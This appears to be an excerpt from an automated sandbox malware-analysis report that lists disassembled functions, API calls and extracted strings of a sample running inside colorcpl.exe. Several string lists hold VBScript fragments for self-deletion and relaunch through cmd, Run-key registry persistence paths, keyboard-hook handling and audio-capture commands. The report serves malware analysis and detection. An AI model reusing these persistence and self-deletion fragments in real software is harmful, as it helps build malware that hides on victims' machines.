                                          • Part of subcall function 04A8A7F2: UnhookWindowsHookEx.USER32(?), ref: 04A8A811
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A892EF,00000000,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A823
                                          • Part of subcall function 04A9A17B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,04AE9654,00000000,00000000,04A8BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 04A9A1BA
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8C37D
                                        • ExitProcess.KERNEL32 ref: 04A8C389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1861856835-1536747724
                                        • Opcode ID: 4c2703993d4ac7a83cfefde7a6f45f3496a08aa0fc2f54b305053ecc915d4785
                                        • Instruction ID: 117086953eca534c3815472c541d1486d63ec6e72c5d0466667b4cdf112e60a4
                                        • Opcode Fuzzy Hash: 4c2703993d4ac7a83cfefde7a6f45f3496a08aa0fc2f54b305053ecc915d4785
                                        • Instruction Fuzzy Hash: 5891C3722042006BF718FBA1DE90EFF77E9EF90218F40092DE55697191EE21BD0ACB52
                                        Function 04A8BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A912B5: TerminateProcess.KERNEL32(00000000,04AF21E8,04A8E2B2), ref: 04A912C5
                                          • Part of subcall function 04A912B5: WaitForSingleObject.KERNEL32(000000FF), ref: 04A912D8
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8BD63
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 04A8BD76
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8BDA6
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8BDB5
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A89305,00000000,04AF21E8,04A8BC76,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A801
                                          • Part of subcall function 04A8A7F2: UnhookWindowsHookEx.USER32(?), ref: 04A8A811
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A892EF,00000000,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A823
                                          • Part of subcall function 04A99959: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,04AE9654,04A8BDCB,.vbs,?,?,?,?,?,04AF2200), ref: 04A99980
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8BFD0
                                        • ExitProcess.KERNEL32 ref: 04A8BFD7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: ")$.vbs$05#v`#v$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                        • API String ID: 3797177996-2323060813
                                        • Opcode ID: f5b2876144d31d17e63b424c04b79590ff63930282891d2a0ca3ecb60fdaa664
                                        • Instruction ID: c4504ab9dcaadbc635a3e8650c510c429b8bf6321e5150f2382b23e590c8bd9a
                                        • Opcode Fuzzy Hash: f5b2876144d31d17e63b424c04b79590ff63930282891d2a0ca3ecb60fdaa664
                                        • Instruction Fuzzy Hash: 8C81D4726042406BFB18FB61D990EBF77E8EFA0208F10082DF55697191EE74BD0AC752
                                        Function 04A90EDA Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,04AF2200,04AF1FFC,00000000), ref: 04A90EF9
                                        • ExitProcess.KERNEL32(00000000), ref: 04A90F05
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04A90F7F
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04A90F8E
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04A90F99
                                        • CloseHandle.KERNEL32(00000000), ref: 04A90FA0
                                        • GetCurrentProcessId.KERNEL32 ref: 04A90FA6
                                        • PathFileExistsW.SHLWAPI(?), ref: 04A90FD7
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 04A9103A
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 04A91054
                                        • lstrcatW.KERNEL32(?,.exe), ref: 04A91066
                                          • Part of subcall function 04A9A17B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,04AE9654,00000000,00000000,04A8BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 04A9A1BA
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 04A910A6
                                        • Sleep.KERNEL32(000001F4), ref: 04A910E7
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04A910FC
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04A91107
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9110E
                                        • GetCurrentProcessId.KERNEL32 ref: 04A91114
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 2649220323-3088914985
                                        • Opcode ID: 31bf563cd36b0229f3e25b6f26c81d99e7a88ec9081f44d99908b37f2116350e
                                        • Instruction ID: ba42829b2ff646ce06a3af5dfa04f8c946c737c6c16624178669c234d83acf3f
                                        • Opcode Fuzzy Hash: 31bf563cd36b0229f3e25b6f26c81d99e7a88ec9081f44d99908b37f2116350e
                                        • Instruction Fuzzy Hash: 8C51A172A05219BBFF10BBA09D58EFE33FCEB04614F0045A5F502A71C1EF75AE468A60
                                        Function 04A98FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 04A990F2
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 04A99106
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,04AE3050), ref: 04A9912E
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,04AF1E78,00000000), ref: 04A99144
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 04A99185
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 04A9919D
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 04A991B2
                                        • SetEvent.KERNEL32 ref: 04A991CF
                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 04A991E0
                                        • CloseHandle.KERNEL32 ref: 04A991F0
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 04A99212
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 04A9921C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                        • API String ID: 738084811-1354618412
                                        • Opcode ID: 2a44e3dfcd6e51a001cb81386934909fe46993a2e5f9f78c6a8e688499b9c2d0
                                        • Instruction ID: 82e265980fcd744f1ffdd5401645945c8a85fe057a3bf40cdded30228b44e603
                                        • Opcode Fuzzy Hash: 2a44e3dfcd6e51a001cb81386934909fe46993a2e5f9f78c6a8e688499b9c2d0
                                        • Instruction Fuzzy Hash: 9651B2B1204204BFFA14FB71DD95EBF37ECEB91298F50011EB05656190EE25BD0ACA62
                                        Function 04A8B871 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 296fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 04A8B882
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,04AF1FFC), ref: 04A8B89B
                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000,00000000,00000000,?,04AF1FFC), ref: 04A8B952
                                        • _wcslen.LIBCMT ref: 04A8B968
                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000), ref: 04A8B9E0
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 04A8BA22
                                        • _wcslen.LIBCMT ref: 04A8BA25
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 04A8BA3C
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8BC2A
                                        • ExitProcess.KERNEL32 ref: 04A8BC36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                        • String ID: """, 0$6$C:\Windows\SysWOW64\colorcpl.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                        • API String ID: 2743683619-306929222
                                        • Opcode ID: 36557e1a6f2dfabeb804c2b15178cd8bfefe510a9937f5f4d8ef12339d2a26df
                                        • Instruction ID: ac9970a4c2d17204819a7dfef4ad7bada2a5055f838e9ed7db3cb750358f6f47
                                        • Opcode Fuzzy Hash: 36557e1a6f2dfabeb804c2b15178cd8bfefe510a9937f5f4d8ef12339d2a26df
                                        • Instruction Fuzzy Hash: 4A91C2712083406BF618F7A1DE50EFF7398EFA4218F50041DF55697191EE30BD4AC662
                                        Function 04A81A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04A81AB9
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 04A81AE3
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 04A81AF3
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 04A81B03
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 04A81B13
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04A81B23
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04A81B34
                                        • WriteFile.KERNEL32(00000000,04AEFA9A,00000002,00000000,00000000), ref: 04A81B45
                                        • WriteFile.KERNEL32(00000000,04AEFA9C,00000004,00000000,00000000), ref: 04A81B55
                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 04A81B65
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04A81B76
                                        • WriteFile.KERNEL32(00000000,04AEFAA6,00000002,00000000,00000000), ref: 04A81B87
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 04A81B97
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04A81BA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: 1346f98bc2ef3bb25f60de821ba0e7327cf305f6a106d2e44b3a3b4b7b30cca3
                                        • Instruction ID: 20a8c21e7f107a467e86b7c1ab47e6b3b69efd74a5764f57252dcdd4ee56ee15
                                        • Opcode Fuzzy Hash: 1346f98bc2ef3bb25f60de821ba0e7327cf305f6a106d2e44b3a3b4b7b30cca3
                                        • Instruction Fuzzy Hash: 06412A726443197FE210DE52DD86FBB7EECEB89B50F40041AF644DA080D7A4E9099BB3
                                        Function 04ACC60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$EnvironmentVariable$_wcschr
                                        • String ID:
                                        • API String ID: 3899193279-0
                                        • Opcode ID: b98985fe9ee6ab3a1d1b27ba8c1400378970f5037413ed8c9f329dcc80550646
                                        • Instruction ID: 2fb8cc59d1098dc21fcaf9ccd91e74110757f5bb127935587a07b60b51d2de76
                                        • Opcode Fuzzy Hash: b98985fe9ee6ab3a1d1b27ba8c1400378970f5037413ed8c9f329dcc80550646
                                        • Instruction Fuzzy Hash: 40D15971D053047FEF61AF788A44A6E7BA8EF01334F05816DED5A9B281FB39B8018750
                                        Function 0691E5A5 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 376COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: xF$xF
                                        • API String ID: 269201875-3476023522
                                        • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                        • Instruction ID: c6d42cc1d2b776f159aae3ff29d20e663072dbbceae223ad74cd9c4ee772159c
                                        • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                        • Instruction Fuzzy Hash: 91C15276D4020DAFEBA0DBA8CC41FEAB7F8AF48714F244165FA14FB685D6709D4087A4
                                        Function 0691F26B Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0691F2A4
                                        • ___free_lconv_mon.LIBCMT ref: 0691F2AF
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4C4
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4D6
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4E8
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4FA
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E50C
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E51E
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E530
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E542
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E554
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E566
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E578
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E58A
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E59C
                                        • _free.LIBCMT ref: 0691F2C6
                                        • _free.LIBCMT ref: 0691F2DB
                                        • _free.LIBCMT ref: 0691F2E6
                                        • _free.LIBCMT ref: 0691F308
                                        • _free.LIBCMT ref: 0691F31B
                                        • _free.LIBCMT ref: 0691F329
                                        • _free.LIBCMT ref: 0691F334
                                        • _free.LIBCMT ref: 0691F36C
                                        • _free.LIBCMT ref: 0691F373
                                        • _free.LIBCMT ref: 0691F390
                                        • _free.LIBCMT ref: 0691F3A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$___free_lconv_mon
                                        • String ID: xF
                                        • API String ID: 3658870901-2169143296
                                        • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                        • Instruction ID: 9fc09d69a17113c759b103fc4e919d6ea7f369340ee797fd3bc39e3c20d97539
                                        • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                        • Instruction Fuzzy Hash: 45319E75A0020D9FEBE0EB79DD44B5A77E8AF44760F31492AE478EF950DB30A842CB15
                                        Function 04A937DC Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04A9382B
                                        • LoadLibraryA.KERNEL32(?), ref: 04A9386D
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A9388D
                                        • FreeLibrary.KERNEL32(00000000), ref: 04A93894
                                        • LoadLibraryA.KERNEL32(?), ref: 04A938CC
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A938DE
                                        • FreeLibrary.KERNEL32(00000000), ref: 04A938E5
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 04A938F4
                                        • FreeLibrary.KERNEL32(00000000), ref: 04A9390B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                        • API String ID: 2490988753-744132762
                                        • Opcode ID: 5b06c34f270be4842670f316639e5cabb174f05cd67278ae1296f30b3a19653d
                                        • Instruction ID: 24ef0a6f255daecc6e114a83bf7fabed96837d4c292894668a5a08f1680f9e81
                                        • Opcode Fuzzy Hash: 5b06c34f270be4842670f316639e5cabb174f05cd67278ae1296f30b3a19653d
                                        • Instruction Fuzzy Hash: 3831C2B2802311ABDF20AF65D8489DFBBFCEF49754F000618E89597200D739ED058BA2
                                        Function 04A9A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 04A9A43B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04A9A47F
                                        • RegCloseKey.ADVAPI32(?), ref: 04A9A749
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1332880857-3714951968
                                        • Opcode ID: 7b5ff0a8ad4bfda3a73a6f25a7de2b346af4e593d891be46aedcc5821cb536c3
                                        • Instruction ID: 7cfb5379ac9810eef505092be1a30af372ac72210585c5f75bfb1186391a69b0
                                        • Opcode Fuzzy Hash: 7b5ff0a8ad4bfda3a73a6f25a7de2b346af4e593d891be46aedcc5821cb536c3
                                        • Instruction Fuzzy Hash: 668100711083859BE724FB51D950EFFB7E8EF94308F50492EE59A82190EF30B94ACB56
                                        Function 0691D3D2 Relevance: 22.9, APIs: 15, Instructions: 419COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$_wcschr
                                        • String ID:
                                        • API String ID: 565560161-0
                                        • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                        • Instruction ID: 2a79c559cacf504457d75bc49dae07911f7b02562205f67737d4fb2af3d9d4ed
                                        • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                        • Instruction Fuzzy Hash: 50D128B1D0030C6FEBA0EF749C8066A7BE8AF05760F35417EE9659FAC4EA319508C795
                                        Function 04A9B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 04A9B38F
                                        • GetCursorPos.USER32(?), ref: 04A9B39E
                                        • SetForegroundWindow.USER32(?), ref: 04A9B3A7
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 04A9B3C1
                                        • Shell_NotifyIconA.SHELL32(00000002,04AF1AE0), ref: 04A9B412
                                        • ExitProcess.KERNEL32 ref: 04A9B41A
                                        • CreatePopupMenu.USER32 ref: 04A9B420
                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 04A9B435
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 68b07473d2b90d619cf0ac12578fd49618c10d855daad5a9bab1eb360ef86dda
                                        • Instruction ID: 3cabfb5b2f496a503a79ee2dac1ceae2428d7e2ecef07d36dff640c0ba96791e
                                        • Opcode Fuzzy Hash: 68b07473d2b90d619cf0ac12578fd49618c10d855daad5a9bab1eb360ef86dda
                                        • Instruction Fuzzy Hash: D421C975111109FFDF099FA4FD0DAAA3FF5FB24701F444614F606954A0D77AAD22AB20
                                        Function 04AC3268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Info
                                        • String ID:
                                        • API String ID: 2509303402-0
                                        • Opcode ID: 4622bfe0db675041215c9274bc4cc98b887fbfbcaaa6d39e98af43a00a4d82d1
                                        • Instruction ID: 0d83e46e20e7a415c8c06549a90071d8649c88f503f118f6ec3d41865cb064f8
                                        • Opcode Fuzzy Hash: 4622bfe0db675041215c9274bc4cc98b887fbfbcaaa6d39e98af43a00a4d82d1
                                        • Instruction Fuzzy Hash: 33B1A171904309AFEF51DFA8C984BEEBBF4FF08304F14816DE999A7241DB75A8458B60
                                        Function 0691402D Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                        • Instruction ID: 100b53696b3c06a742df70c6914df0e563808acaab42442f101400d595d81223
                                        • Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                        • Instruction Fuzzy Hash: F3B1A271D002099FDB91DF65CD80BEEBBF8BF48700F244429E9A5AF641D7759842CB60
                                        Function 04ACE4A6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 04ACE4EA
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD6FF
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD711
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD723
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD735
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD747
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD759
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD76B
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD77D
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD78F
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7A1
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7B3
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7C5
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7D7
                                        • _free.LIBCMT ref: 04ACE4DF
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04ACE501
                                        • _free.LIBCMT ref: 04ACE516
                                        • _free.LIBCMT ref: 04ACE521
                                        • _free.LIBCMT ref: 04ACE543
                                        • _free.LIBCMT ref: 04ACE556
                                        • _free.LIBCMT ref: 04ACE564
                                        • _free.LIBCMT ref: 04ACE56F
                                        • _free.LIBCMT ref: 04ACE5A7
                                        • _free.LIBCMT ref: 04ACE5AE
                                        • _free.LIBCMT ref: 04ACE5CB
                                        • _free.LIBCMT ref: 04ACE5E3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 41c979ee838667a1ab904165c7c8012ccd1c603d80f7618d3b6cca96293c13c4
